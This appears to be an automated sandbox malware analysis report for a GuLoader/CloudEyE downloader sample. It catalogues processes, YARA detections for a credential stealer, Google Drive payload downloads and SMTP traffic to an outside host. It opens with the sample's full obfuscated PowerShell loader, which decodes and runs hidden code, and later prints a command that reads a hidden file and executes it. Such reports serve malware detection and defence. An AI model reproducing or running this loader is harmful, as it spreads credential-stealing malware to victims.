SCDi2FyCDi4KaDUn3afDDeACoDHoASt9Ku6ge9Fe2BlFTu1 CCRe3UnDRa2UnDUn3FrC K5Tr8Dy2Vo9SlFFr9unAEk9Ko6Se9TrEEuF P1EsFsp2UnEOf2 A9Su6ReFMa6Fa9EdEDoEprDSpF UF ADFa8TeC R2 lERe6rvCCa2CeCCa4skEunBAf9VaA P9 R6SoE SDSmEOv3UlF SFAmDca8BuCHo2Ur8Pr5Ka8Bo4DiE UBsh9KaAAm9Ne6UbE sDdiEIg3NoFEvFSoDAp8UfCSt2 N8Me5Ta8tr4DjERaBNi9unAbi9 S6StE DD BEFe3 CF TFReDMu8NoCSt2 R8St5 S8 S4 OEjuBFo9DoFUd9Re6Un9 SEHiEOxD PF IFBrDPa8BaCPh2OpELn6DdCVi2kaCBi4 NEPrBFe9 XFSh9NoFMu9UnF R'Un; A&Zo(La`$NoG UuHadSte TsIm7 T) A Un`$ SESkrStaResDeeOddUn6Kl;Le`$BeB EaResRye NnPoe FsSesRe0Pr1pr Sn= G KBAla Ws SePenHae PsEnsPr0Aa4Ps Si'Re9Ri2 FFNo9ReCTo0 pDop3InCHe4PrDRaEKrDUd9AtDCaAFjDTiASpDBr9LiCBr1Ba9Li6Ve8ViBGr9Pr6 sEElDHeEma5 NCRuFEnCOl5CoChn2NeDUd3ApDAsBOu9Pr8ScEAn4VaCcy3 ADFo8DaCKv2 KDDiFHoDCoB VDCo3Xy9Op8UlFUdFSkDZa8 OC B2 CDSt3StCso4HuDMe9SyCso6UnE R5PiDGr3DiC E4BeCha0 BD fFAuDAm5KaDIm3RaCma5Re9Ma8 SFInBWhDFo7OmCLi4 ICan5FrD KE SDNo7FjDPrA CEPrBpo8PeCOp8OsCSoFBi1ArDMi3 CCSv2MeFFo2DaD C3EkDUdASpD C3AnD P1HaDRe7KrCSp2 SDte3VeFKn0SyDMo9FoCFj4FiFDo0TmCPl3MeDte8ToDLi5ArCHe2ByDDyFStD B9StDFu8LaEIn6HaDAu9 LDSoF FDFo8EdC S2UnDph3laCSt4Re9BaESu9ScEBeDUn0AfDraD bC B6 V9No6Sa9Om2SuEPl5PrD SDBeDEkFPrD KADiDUf2 TCBo6ThDFo7RaDMe2EfDOf2UnDfe3DuCBe5 OCIm3 KC S6InCWh6GuDPe3GeCSt4StDRe8 RDSe3Sn9Vi6Be9Po2 UFUr4reDUn7StCbl5tuDBe3KaD S8TrDGi3 OCPr5TaCOv5ab8Ne6 S8St6ud9WiF F9 BA R9We6Pl9RoEWaFRu1OpFMa2cuEDi2Sy9Me6 FFEk6To9 sEFlESaDJoFChFBiDBa8VeCNi2AlEDi6AkCko2MiC P4SaEBrBFi9ReA E9 a6StE HDLsEMe3GeFNyFReDMb8SkC P2Bi8Ap5Sc8Ge4CeE SBSu9SkFYa9 R6Ke9BeESuEDiDUnFPrFApDCy8AtCPo2BrERe6 BCCo2SaCPo4 KELaBAs9StFRe9 SFSp9bjFHe'Af; P&Pi(Ad`$ SGIkuBodLae wsMa7 E)Di Ha`$FoBSiaNesHie UnSteVesHvs N0Su1Ch;Kk`$KaBWoaFosPeeAfnKleResKrsSe0Bl2Fr In=To UdBPraAssMyeManTrebosAdsEg0Ol4Ph Ny' G9Ro2KuEAn3KlD HBBoCUn3OpC K5KiDTrF WDHyDKrDSt7TrD RA UCMa5 PDIsD gDTv3 SCFr5To9Sm6Tr8MaBDa9Pu6 SEStDBaECh5StC nFOpCPr5 pCSk2OrDSk3AtDsaBLu9ce8WaEdi4ArCse3 UDUl8MiC B2RaD GFBiDHaBUsDIn3 U9In8HyFSeF UDRi8adCAr2InDSl3PrCSu4ToDGa9AnCOv6HiE A5BrDMa3miCCr4AsCAf0DoDTrFOpD B5LaDSt3 UCKe5vi9 S8DrFunBMeDSk7ViCSt4 dCDe5FoDSkEMiDUn7HeDLeA UEDrBKo8NoCRi8InC SF S1 EDMo3BaCCy2NoF K2TyDHo3KeDAdADaDIm3NeDGr1SmD A7PiC S2BoDDr3FoFBr0IoD B9SkCFy4OvFUn0InCDi3LeDUd8 ADAs5 DCWa2TyD TFHoDIn9CoDSe8MaE B6PrDqu9TiDOvFfiD P8 CCUn2NoD S3reCHe4Nd9InECe9RaEElDYa0 SDFiDMiC S6An9 F6Be9sp2LiFDu5 CD H9BrCCa2FrC O2 IC B4CeDMa3viD GAArDArACr9Ty6Tr9Sw2OvFMu4AnD m7ReCMo5 MDGu3MaDPs8UfDDa3DaCDi5BiC W5re8 s6Un8 O5Ne9 FF H9IdABi9Mi6 O9KlEBrFHe1ExFEa2 nE S2Pr9Kr6KrFFo6Sk9PrE BEVaDInFCaF GD I8StC D2MaECo6ChC b2exCin4 GE IBSy9OpF D9St6un9RuE PEOpDHyF FFRoD L8SyCHi2MuEAe6InCVa2SqCNi4 WE HBid9SeF R9BoFCo9UnFSa'Re;Sk&Re(fo`$ sGHyuFadAaeUnsJe7 S)Sm Ot`$teBPraAnsEkeHenBreinsTasRe0 d2Un;Wa`$SyE PrmiaspsAfeTidHe7An No=Fo GyB JaBasFeeAtnuneFlsSlsfo0Bf4Su Mi'Dd9Br2 BE E6BlDReFfoDBi8 dDSyDmeD D3koCIrF MDDe3 PCLa5Sk9Mi6An8ReBDe9sa6Un9Th2SuESm3OkDGtBApC B3DkC S5PrDMeFSmDheDAnDCl7SaDPaALoCUn5CoDHyDMiDUr3NeC S5Gr9 U8TaFMeFGuD E8 SCTe0FrDMa9KeD PDUrDNy3St9BrE D8De6Do9UnFPo'Fo;Sw& A(fe`$LeG Ou pdsieUnsTu7Be)Un Cr`$seE SrKoaMas weHrd U7Am;Ad`$BiEphrTraupsHaeFodVi7Un Ri=Tr leBPoaOtsUbePenSueInsMasOd0Sk4 P mi'An9ge2JoFOp9GrCGe0SrD S3UvC C4NoD FE ODGo9TaDEsANoDRaAEnDvi9AfCTa1St9Se8TrFSuFKlDTe8SuCSo0TrD C9BoDMeDOpDAr3 U9FlEMa9Ex2NoEAi6AnDOpF BD E8stDCyDFuDFr3NvCSaFSiDWa3 aCen5Al9SkAWa9No6 F8Pr6Ha9 FFab'Om;in& s(Ki`$HuGHtuGrdsteDus U7Be)Cl A`$ IEBerEmamusOleSadRo7De;Un`$PrS KjAvlPolSrnAnd WeLirInn CehosStl IoAskLneBrrVai Kn LgAfeCorSonUneNo3 I5Le Da=in AfUnkBepRe N`$hjGPauKidpieErsTi5Fi Dr`$ TGTiuAbd Oe TsFl6 A;Le`$ArEPrrsuaAcsKueSudPo7Ud co=Hy CB TaResUne TnLyeResBrsCa0Go4 A To'Fo9 F2ArEPr5DiDMu3suDByCunCOb4SlCUn0SyDChF MDFa8BaD a2LiD OF TDAf8ImD A1ReCSm5Un8 D5Wa9 H6Ud8FrBSp9Mi6Ga9Re2ScEUn1 CDWa7PrCCa2BiDLu3AgCHk4ElD MABaDIl9FoDFo1 sDDr1PiDEv3 ADad2 KDKl8UaDSi3CaCSk5BiCTa5To9de8StFRoF HDmo8InCAb0SmD U9PrDHeDRaDRu3No9HiE TELaDTeF FFShDHe8 FCMa2PrEHy6 wCSr2 LCAt4faEUnB B8ouCSk8 ICStEFoC pD D3TrC L4PaDDm9Ta9FeA K9Mu6An8Kr3Tr8EmEOk8Re3 P9AcALi9Co6me8Fe6DeCUhETo8 U5So8 O6Dr8Me6Fl8Re6In9MaARe9Pa6Lu8sn6BoC ZEFe8ga2Ko8Em6Ha9taFSk'Pa; H&Kn(Fr`$EpG WuDidFaeHjsMi7Un)Wa La`$BeE Br SaWasBie DdUn7Pa; P`$RuEHurKeaApsDieUndMe8Ko L= r ofBGeaUns Seken se FsAzsVi0Ga4Tr T'Re9Af2KaFRe5trDPlF sDSyBPoDNaBTeDBoFLa9Le6An8SeBUn9Kl6Un9Je2DeE E1InDPs7FaCHn2ShDCr3KlCGr4reD OA SDKo9UdDBa1 HDAl1 SDFo3efD B2deDFr8 GDGa3KeCRi5ToCAs5Kv9pl8EkFblF FDve8UnCZi0PhDSt9KoDFuD HDMi3 M9ViECeEHyDEnFreFOvDal8TrC O2PiEEg6SvC A2 oCMa4ArEUnBVu8KiCFe8DiCunEUdCBeDIr3 ECap4SqDNa9Li9 RASo9 S6Sk8ni1Fo8Om2 S8 S7Ga8In7 H8Sk1Bl8Su7Zo8Fl4Be8De6Er9UnA G9Ji6Sl8Se6SaCbiEEk8Fl5Ti8Ka6St8Un6Sk8 F6Pl9KaAFr9Pr6 V8Cr6AnCLiE D8Do2Un9LaFGe' T;Re&Ba(An`$StGlouSadToeWisEx7 U) B Ce`$TaE NrAraFys DePrdSk8Do;Un`$UoSUreSejGirMovReiTrnImd OiUnnudgOvsFy2Ko= A`"""Te`$DeeMonFovTv:laTynEOmMEmP f\EmeVepNaiStcpaeAlnGltTir GuBrmMamOreForHasmo\StEEslgeeHyvtoeCa\leNAcaAutPouUkrFlfAnr ReTrdSunReiTinOvgLrsPlfReoDarAdeBenBeiGan SgApeKarLunFoeSp6 S\unBPer UeUndOpdfle Dsch.LoBHeyNegGa`""" H; D`$ SEKar FaSts He Td C9Sk Di=Wi CB Ea CsvaeAnn Ce BsResVa0Cr4An Si'Un9St2 SFFa3TrCPe4 ADFa7SaCNu5FlDAx3 LDAm2Cu9 N6Fi8FlBAn9py6 UEFoDTuEPr5UnCToF sCar5 SCSp2FlDMo3ufDReBgn9Ce8 NFEnFSiFdi9Tw9Ca8FrFSm0MiDMuF DDleADeDEn3DuEPrBOv8FoCTi8AsCAbESt4DiDSk3 DDOm7SkDMa2StFLy7taDNoAUaDShA CFBo4 RCMiFOuCHi2IfDPh3MoCTi5Sl9GoESk9Ge2DiEUn5AdDke3FrD FCReCCi4 MCPu0OmDCoFKoDGi8PoDLu2HaDBiFZeD E8CoD D1 NCMi5 P8No4Sh9InFHe'Im; S&co( P`$EtGPlu Kd AePusFi7Co)Pl Up`$RaEThr IaUdsHeeBedRe9Of;st`$BrQ buLaeBjrNecUniBamSteMirCai StTar Mi VnUd0pr Op=to BaBSpaSusCaeGsnSkePrsUdsVi0 B4Jo S'SkEGrDRyE V5UkCBlFPlC D5caCox2StDRa3DrDsyBLi9Au8inEBa4 ACSa3 ODBe8TaC A2BoD MFPhD PBKvDSi3Ud9Vi8 VFPrF TDCe8RiCBi2liD M3SiCDe4jeDNe9UnCJe6SaEMe5HeDGa3 SCBo4BeCUn0DyDNoF CDBi5 RDSl3 eCGr5 u9Sa8CrFUnBSkDps7KlCMa4AfC G5BlDCiEOvDFo7 PD UAPaEIlBFl8VeCFl8AaCIdF H5DeDIn9 ECSu6CrCSkFRe9EkEFe9 S2PoFPr3 FCSc4KiD U7 MCMi5GoDSt3agDOm2Ha9BuAPn9 d6Fu8Na7Do8Ka6 e8Ma4Li8 t2Tu9KoAIn9 B6Br9Ir6Ge9Fu2NeEUs5JaDSa3WiD JCToCLe4UnCSi0saDMeFTaDEr8CoDHe2UdDCoFGrDSt8FeDFi1BiCAu5Gr8Ca5 K9OvANy9Pr6St8Sa3At8 PEHa8ma3 b9StFpe'In;Is&En(An`$UnG Cuald TeUnsEs7 O)Po T`$BrQLiuRae UrOpcTiiRnmCyeAsrBliCotOrr SiBanUn0Un;Bl`$PaSimj SlAnlUnnJodSee RrVanBueSpsUneAnvGraRkrSheCon adhaeTesDi=Fu`$StEEkrOlaItsmeeOmd O.FacFaoSiuTnnStt A-Ne5 B8Ad5Er-Di1Ve0Lo2An4 a;Ex`$ FQ WuReeBerPicRiiInmMaeinr RilotSlr FiMan T1Dd F=St CuBInaShsPreAunLieKlsFosBk0Sa4Bo Pr'GaENoDInEAf5ShCSyF BCLo5SpCBy2alDPl3GoD LB M9Sw8SuE I4UdCRe3ReDUn8PoCDi2 ADtuF SD GBPrDSt3sp9Be8FlF MFLfD U8CoCKr2inD P3MeCUn4ReDAn9OvC S6UnE R5AnDHl3BeCGo4SaCNo0MaDFyFTiD P5IrDBy3AmCBl5Fu9Tr8 EF CBSeDSo7DeC K4FoC A5FoDDeE ADSi7CaDSuAByEGlBCo8ScC B8SeCBuF S5neD D9BlCSu6LuC CFFo9DaERe9Mi2InFBa3SeCSj4drDre7GeCUn5GeDUn3stDAn2 c9 SA U9Ti6 O8Er3Gu8ReERa8St3Bl9DiDCi8Ba7 K8Pe6Be8As4Af8 H2Du9BlAAr9 F6Ox9Br2BeFSt5prDBeFKlDreBCaDMjBPrDUnF C9UnAAf9Sy6Gr9Da2HaERo5SpDmbCGeDJuAUnDOmAMuDPa8AmD R2FoDRe3poCNa4GeDNo8glD R3DiCVo5 ADMo3UnCHo0VaDVi7 DCDy4LeD M3DiDUn8 AD F2PoDsp3MuC T5Un9alFAm'Ma;Un& H(vi`$ KGPruVadAveScs T7Ay)Hi S`$StQ PuPiefnrAkcgriHom DeReridi TtPirAkiMenVu1Kv;Ov`$MaQQuuIde UrFlc UiSam seVarAbiSutSjrRiiHanFi2Re S=Av HB DaDrsEke CnSte SsrasGe0vr4 S Co'Ha9Af2FlD VF RCbo2DaDCh7 SDEmAReDSlFLiDDi7EmD M8CeDCo7AxCHo2GrDTu3KjD RAFrCSeF D9 S6Je8TrB T9 A6 FE LDKlEBu5PlCreF KCHu5caC V2DiD k3FoDUnBFo9Ko8PuEIa4 ICfr3buDSp8BiCUn2reDaiF RDToBExDSe3Ud9In8DeFStFOrD S8 LCCa2TeDSa3 ECAf4LeDde9MeCFo6StETr5 KD H3AnCBr4AgCRe0CoDAiFveDSu5InDDe3LiCsk5Ac9An8NuFMiBCoDMu7 NC T4NaC D5PaDSeEPeDVr7 SDReA TEHeBsa8ReCLr8SeCdiFBj1TrDRe3 VC l2 LF P2TiDLo3ChD PANyD B3NiDDu1ReDKo7 PCPa2 PDGa3faFTi0FaD S9taC T4SpFSo0KoCOv3AaDRe8DeDBe5BrCBa2DeD FFMiDSt9DaD S8 dEWh6 SDSt9BeDUtFAlDVo8CeCBe2 CDBr3NoCRe4Su9CrERe9 KEbaD R0MoDDaDMyCBr6Ti9lu6Le9 S2VrDTr7ScDChAIsDKlACaDSa3baCBa4IfCSi3HyDPr8SlD A2 SD S3LiCAn4SaDRa2HjDJu7VoD G8TrDKaFBeD V1AbCNo5 uC L2SuDGr3DeDOv0CaC G4MiD S3AgCAb0Ko9Wi6Bo9Pr2MaF E1SoDCh7OuCIn5skCDr4VaCUn4CuD OASkDLa3ScDAw2SuDVi8SkDPlF ADFa8StD U1FoDBu3FoCCa4InC A5 N9KuFSk9ArADa9 G6Ur9SaEPoFKh1StFth2EfE N2 s9Re6ReFSt6Tr9HjEHaEVkDGsFSoFTeDMu8HeCbe2MyESa6 PCEd2RoCBo4ItEViB O9UnAGo9Dm6bnEEmD fFAfFErDTr8heC O2MoEPo6hvCEm2SuCmi4PrECoB P9UnACe9ok6InEDiDFoFHoF TDse8anCTe2DrEBa6 CCPi2wiCPi4FrEBeBPe9AnAFo9Fo6AsE hDTrFDoFShD h8 BC B2 SEne6BlCAm2SmCRo4RoEStB D9TiABa9So6BuE AD EFShF TD T8GeCMe2faEFi6TyCBr2 CC U4naELoBfo9AsFSt9Ic6 S9 PESuEStD bFAuFadDOc8NeCSk2GeEIn6MaCTa2EnCSy4 pE UBHo9DeFMe9MaF E9ShFTr'Ek;Pr&Su(Sm`$elGOluGodNoe tsFa7 P)Af Pr`$VoQSaupleScr ScSkifrmDieUnrPribitMorCoiInnKo2Pr;Gr`$UnQSku PeGrrPec Oi Gm FeDur PiSttInrPriGlnAm3Ve In=Nu AfBDeaUnsSteBlnTjeSnsKisUd0 F4St Ca' T9Ca2BgDAfF DCHe2SaDsj7OvDEpAHoDNeFDiDSt7MiDPl8SkDKo7noCMi2LeDUd3StDStAUnCnoFLo9 L8HjFScFDrD A8InC I0 bDev9maD CDUkDOv3Va9amE Z9Fa2CrESr5 FDOm3SuD MCPoCBo4PeCLi0ScDSlF uDRe8 LDSt2EsDReF CDjo8HiDka1NvC U5No8Fe5Eu9GaABi9Pa2ReFIn5PrDUnFVaDNoBSpD OB MDInFSp9KrAIm9Lg2MeETu5ReDInCDuDHoAExDMaA VDHe8SaD F2 CD N3BlCAr4FoD H8LlDBl3ErCLa5RiDMaABoDKe9 BDThDHeDBo3TiC F4SkD GFcaD s8prD Q1HiDLu3 RC P4ArDPr8AnDCa3 S8Ch5Co8 I3As9noASp8Bl6Ti9BuAOk8Lo6Bl9DaFDi'Ar;Ga&Ta(As`$StG Su OdKoeSusHu7 R)Be Ba`$HeQMauVeeGrrGrcBoiInmKae LrCuiRutExrUfiUnnFo3Fa# A;""";function Quercimeritrin8 ($allerunderdanigste,$Sjllndernes) {&$Kikkerternes0 (Quercimeritrin9 'En$abaLilDul leRar GuTwnabdTaeBprMudChaFunPri HgBesKat Cefr Es-TtbInxCho UrRi De$ TSOvjGil LlFlnlodMye Dr FnBeeBrsNi ');}function Quercimeritrin7($Smadderkasses) {return $Smadderkasses.Length;}Function Quercimeritrin9 ([String]$Tachygenesis) { $Merice = Quercimeritrin7 $Tachygenesis; For($Jimcrack=2; $Jimcrack -lt $Merice-1; $Jimcrack+=(2+1)){ $Baseness = $Baseness + $Tachygenesis.Substring($Jimcrack, 1); } $Baseness;}$Kikkerternes0 = Quercimeritrin9 'PaI PEFuXEu ';$Kikkerternes1= Quercimeritrin9 $Unhappiness;&$Kikkerternes0 $Kikkerternes1;<#articles Beslutningers Slettelandes #>; MD5: DBA3E6449E97D4E3DF64527EF7012A10)

CasPol.exe (PID: 4240 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)

Myapp.exe (PID: 984 cmdline: "C:\Users\user\AppData\Roaming\Myapp\Myapp.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)

conhost.exe (PID: 4608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Myapp.exe (PID: 4996 cmdline: "C:\Users\user\AppData\Roaming\Myapp\Myapp.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)

conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000002.738241406.0000000020D61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.447870712.000000000B40F000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: demand_rpkb_060923.exe

ReversingLabs: Detection: 28%

Source: demand_rpkb_060923.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.251.2.102:443 -> 192.168.2.7:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.7:49759 version: TLS 1.2

Source: demand_rpkb_060923.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\demand_rpkb_060923.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\demand_rpkb_060923.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1n9Cf4lEBPDcOatAVm1yEaJFS19Osui94 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/2krjgeqkqvv0baf5msd218271df8njde/1694071800000/09758452479903950630/*/1n9Cf4lEBPDcOatAVm1yEaJFS19Osui94?e=download&uuid=cf2baafc-5436-4d0a-9dd6-80a6151c2ee2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-0o-4k-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.7:49760 -> 212.44.101.105:587

Source: global traffic

TCP traffic: 192.168.2.7:49760 -> 212.44.101.105:587

Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443

Source: powershell.exe, 00000003.00000002.438452869.00000000030DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.446829144.00000000076E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.md
Source: demand_rpkb_060923.exe, demand_rpkb_060923.exe, 00000000.00000000.196263491.000000000040A000.00000008.00000001.01000000.00000003.sdmp, demand_rpkb_060923.exe, 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: demand_rpkb_060923.exe, 00000000.00000000.196263491.000000000040A000.00000008.00000001.01000000.00000003.sdmp, demand_rpkb_060923.exe, 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000003.00000002.446482174.0000000005D37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.438796688.0000000004E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.438796688.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.438796688.0000000004E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.446482174.0000000005D37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.446482174.0000000005D37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.446482174.0000000005D37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.438796688.0000000004E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.446482174.0000000005D37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1n9Cf4lEBPDcOatAVm1yEaJFS19Osui94 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/2krjgeqkqvv0baf5msd218271df8njde/1694071800000/09758452479903950630/*/1n9Cf4lEBPDcOatAVm1yEaJFS19Osui94?e=download&uuid=cf2baafc-5436-4d0a-9dd6-80a6151c2ee2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-0o-4k-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.251.2.102:443 -> 192.168.2.7:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.7:49759 version: TLS 1.2

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040535C

System Summary

Very long command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 24698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 24698			Jump to behavior

Source: demand_rpkb_060923.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403348

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe	Code function: 0_2_00406945	0_2_00406945
Source: C:\Users\user\Desktop\demand_rpkb_060923.exe	Code function: 0_2_0040711C	0_2_0040711C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 20_2_006D4150	20_2_006D4150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 20_2_006D4498	20_2_006D4498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 20_2_006D4D68	20_2_006D4D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 20_2_006DAD55	20_2_006DAD55

Source: demand_rpkb_060923.exe

Static PE information: invalid certificate

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe 831E937BB8367F2E8A353295AD0AE55C3EC8D5D2C18AC114383623D564BADE84

Source: demand_rpkb_060923.exe

ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

File read: C:\Users\user\Desktop\demand_rpkb_060923.exe

Jump to behavior

Source: demand_rpkb_060923.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\demand_rpkb_060923.exe C:\Users\user\Desktop\demand_rpkb_060923.exe
Source: C:\Users\user\Desktop\demand_rpkb_060923.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
